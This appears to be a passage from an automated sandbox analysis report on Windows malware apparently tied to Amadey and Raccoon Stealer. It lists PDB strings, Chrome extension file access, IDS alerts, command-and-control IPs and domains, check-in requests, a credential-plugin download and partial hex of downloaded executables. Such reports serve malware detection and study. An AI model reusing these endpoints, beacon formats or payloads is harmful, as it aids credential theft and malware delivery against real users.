                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: `C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdbh source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbH source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\lalovum36_po.pdb source: tijXCZsbGe.exe, tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdbN source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbR source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: C:\lalovum36_po.pdbh source: tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_00419BC1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49878 -> 141.8.194.74:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49891 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49930 -> 185.163.204.24:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49935 -> 141.8.194.74:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49941 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49946 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.207.0 25
                          Source: C:\Windows\explorer.exe | Domain query: patmushta.info
                          Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                          Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 185.188.183.61 443
                          Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exe | Domain query: goo.su
                          Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                          Source: C:\Windows\explorer.exe | Domain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1 | Host: 185.215.113.35
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----05b424179b6863bc044442966a2693c0 | Host: 185.215.113.35 | Content-Length: 105185 | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 128 | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----0f843c26b75eb09195970d1b51f66523 | Host: 185.215.113.35 | Content-Length: 105192 | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:02 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 
00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:08 GMTContent-Type: application/x-msdos-programContent-Length: 322560Connection: closeLast-Modified: Fri, 14 Jan 2022 08:25:02 GMTETag: "4ec00-5d5868a108476"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3c cc e1 9b 52 9f e1 9b 52 9f e1 9b 52 9f ff c9 c7 9f fb 9b 52 9f ff c9 d1 9f 67 9b 52 9f c6 5d 29 9f e2 9b 52 9f e1 9b 53 9f 01 9b 52 9f ff c9 d6 9f db 9b 52 9f ff c9 c6 9f e0 9b 52 9f ff c9 c3 9f e0 9b 52 9f 52 69 63 68 e1 9b 52 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 c1 2d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f2 03 00 00 a8 11 00 00 00 00 00 00 c1 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 12 06 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 ee 03 00 28 00 00 00 00 10 15 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f1 03 00 00 10 00 00 00 f2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 61 76 65 00 00 
00 05 00 00 00 00 e0 14 00 00 02 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 64 75 66 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 61 66 61 6c 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 15 00 00 84 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:41 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 
40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
